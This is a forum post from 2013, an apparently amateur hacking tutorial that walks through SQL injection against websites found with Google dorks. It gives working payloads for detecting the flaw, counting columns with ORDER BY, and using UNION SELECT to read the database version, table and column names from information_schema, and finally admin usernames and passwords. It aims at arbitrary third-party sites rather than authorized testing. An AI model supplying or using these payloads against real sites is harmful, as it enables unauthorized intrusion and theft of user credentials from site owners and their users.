hack Website using SQL Injection with easy Steps

by **Admin** Tue Dec 24, 2013 4:34 am

[You must be registered and logged in to see this link.]

Requirements :-

SQL Injection Dorks. [You must be registered and logged in to see this link.]
Vulnerable Website. (Use Google to find Vulnerable Website)
Firefox with [You must be registered and logged in to see this link.]. [You must be registered and logged in to see this link.]
Little bit understanding of [url=http://hackw0rm.blogspot.in/search/label/SQL Injection]SQL Injection[/url] and URL
Fresh Mind to Understand it.

1. Find Vulnerable website.

An attacker always use [You must be registered and logged in to see this link.], [You must be registered and logged in to see this link.] or [You must be registered and logged in to see this link.] search engine for searching SQL Injection Vulnerable websites using Dorks. Dorks with Parameter URL.

[You must be registered and logged in to see this link.]
Search any one dork on Google, For Eg. m using inurl:index.php?id=
Basically I always use Google to search Vulnerable websites. and if you want to Hack particular website, then you have to scan it or manually check every page, URL to identify whether it is vulnerable or not.

Click on Image to Enlarge it

[You must be registered and logged in to see this link.]

Here, for tutorial I already have one Vulnerable website (But I can't expose it's name) In this result you will find thousands of websites. the common thing in this search result is all website URL having this type of code at it's end inurl:index.php?id=
Yeah, Definitely it will have because this all website having SQL Parameter into their URL. So simply Google searched it.

For Eg. [You must be registered and logged in to see this link.]

[center][left] Find SQLi Vulnerabilities

Open any website URL which have SQL Parameter. like Dorks
Put Single Quote at the End of the website URL (')
For Eg.: [You must be registered and logged in to see this link.]
If the page remains same or Not found then it's not vulnerable and if the page shows any type of Error related to SQL String or MySQL Error then the website is vulnerable to SQLi. For Eg. I got this Error .:

An error occurred...You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/contentPage.php?id=8''' at line 1
This means the website is vulnerable to SQL Injection. *Cheers*

Find the number of Columns.

Yehfii !! We found SQL Injection Vulnerable website now it's time to find no. of Columns present in the Database.
To do that replace that one single quote ( ' ) with "Order By no." Statement until you find the Error message. Change the no. from 1,2,3,4,5,6,7,8,9,..... Until you get an Error Message like "Unknown Column"
For Example :- Change it's Order By 1,2,3,4 like below Example :-

[You must be registered and logged in to see this link.] Order by 1

[You must be registered and logged in to see this link.] Order by 2

[You must be registered and logged in to see this link.] Order by 3

And Suppose above Method doesn't work then use below method.

[You must be registered and logged in to see this link.] order by 1--

[You must be registered and logged in to see this link.] order by 2--

[You must be registered and logged in to see this link.] order by 3--

If you get an Error on Order by 9 that means the DB have 8 number of Columns and If u had found error on Order by 6 then the DB have 5 number of Columns. I mean if you put Order by 12 and Suppose the DB have only 11 no. of Columns then Website will show Error like this.: An error occurred Unknown column '12' in 'order clause'.

# This trick is actually used to find the number of Columns in DB. Understand the Below example and you wil get to know.

[center][You must be registered and logged in to see this link.] Order by 1 (No Error)
[You must be registered and logged in to see this link.] Order by 2 (No Error)
[You must be registered and logged in to see this link.] Order by 3 (No Error)
[You must be registered and logged in to see this link.] Order by 4 (No Error)
[You must be registered and logged in to see this link.] Order by 5 (No Error)
[You must be registered and logged in to see this link.] Order by 6 (Error)
.........................Try Until you get an Error..........................

[left]Here, my Vulnerable website Showed Error on Order by 12 that means my Vulnerable website have 11 number of columns in it's DB. So now here I found number of columns in my DB :- Number of Columns = 11

Find the Vulnerable Column.

Basically if the website is vulnerable then it have vulnerability in it's column and now it's time to find out that column. Well we have successfully discovered number of columns present in Database. let us find Vulnerable Column by using the Query "Union Select columns_sequence". And also change the ID Value to Negative, I mean Suppose the website have this URL index.php?id=8 Change it to index.php?id=-8. Just put minus sign "-" before ID.
For Eg. If the Number of Column is 11 then the query is as follow :-

[center][You must be registered and logged in to see this link.] union select 1,2,3,4,5,6,7,8,9,10,11--

And Suppose above Method won't work then use below method:-

[You must be registered and logged in to see this link.] and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11--

And Once if the Query has been Executed then it will display the number of Column.

[left][center][You must be registered and logged in to see this link.]

In the Above result, I found three vulnerable Columns 2,3 & 4. let take 2 as our tutorial Well ! We found Vulnerable Columns, Now Next Step.

Finding version, Database and User.
Now this time we've to find out website Database version, User, Database Name & some other Information, Just replace Vulnerable Column no. with "version()"

For Eg.

[left][You must be registered and logged in to see this link.] union select 1,version(),3,4,5,6,7,8,9,10,11--

And now Hit Enter : and you will get result.

[You must be registered and logged in to see this link.]

Now again do the same replace Vulnerable column with different query like :- database(), user()

For Eg.
[center][You must be registered and logged in to see this link.] union select 1,version(),3,4,5,6,7,8,9,10,11--
[You must be registered and logged in to see this link.] union select 1,database(),3,4,5,6,7,8,9,10,11--
[You must be registered and logged in to see this link.] union select 1,user(),3,4,5,6,7,8,9,10,11--

[left] And Suppose above Method won't work then use below method

[center][You must be registered and logged in to see this link.] and 1=2 union select 1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11--

[left] Finding the Table name.

Here we found vulnerable Column, DB Version name and User it's time to get Table name. If the database version is 4 or above then you gave to guess the table names (Blind SQL Injection attack)
Let us find now Table name of the Database, Same here Replace Vulnerable Column number with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For Eg.

[You must be registered and logged in to see this link.] union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--

Now hit Enter and you can see Complete Table of Database.
[center]
(Click on Image to Enlarge it)

[You must be registered and logged in to see this link.]

[left]Great we found Table name now find the table name that is related to admin or user. as you can see in the above image there is one table name :- userDatabase. Let us choose that table userdatabase and Go on Next step.

Finding the Column name.

Now same to find Column names, replace "group_concat(table_name) with "group_concat(column_name)" and Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--
Do not hit Enter now,First of all Convert table name into Mysql Char String()
Install the Hackbar add-on in Firefox [You must be registered and logged in to see this link.]
After Installing you can see the toolbar, and if you can't then Hit F9.Select sql->Mysql->MysqlChar() in the Hackbar.

[center][You must be registered and logged in to see this link.]
[left]

Enter the Table name you want to convert it into Mysql Char

[center][You must be registered and logged in to see this link.]

Now you can see the Char like this :-

[You must be registered and logged in to see this link.]

Copy and paste the code at the end of the url instead of the "mysqlchar"

For Eg.

[You must be registered and logged in to see this link.]-8 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 68, 97, 116, 97, 98, 97, 115, 101)--

[left]

And Now Hit Enter and you will be able to see the Column names like this

[center](Click on Image to Enlarge it)

[You must be registered and logged in to see this image.]

Great Here we found Username and Password Column .

Explore Database & Hack it.
Cool! now you know the next step what to do Very Happy

..... get the ID and Password of Admin user using this Command into URL.Now replace group_concat(column_name) with group_concat(username,0x2a,password). or any other Column name you want to get Data.

For Eg.

[You must be registered and logged in to see this link.]/index.php?id=-8 and 1=2 union select 1,group_concat(username,0x2a,password),3,4,5,6,7,8,9,10,11 from userDatabase--

[left]

If the above Command doesn't work then use Column name from first and put all Columns at one time and you will able to get complete database.
Now find Admin page using this Method :- [You must be registered and logged in to see this link.]

[/left]
[/center]
[/left]
[/center]
[/left]
[/center]
[/left]
[/center]
[/left]
[/center]
[/left]
[/center]
[/left]
[/center]
[/left]
[/center]
[/left]
[/center]
[/left]
[/center]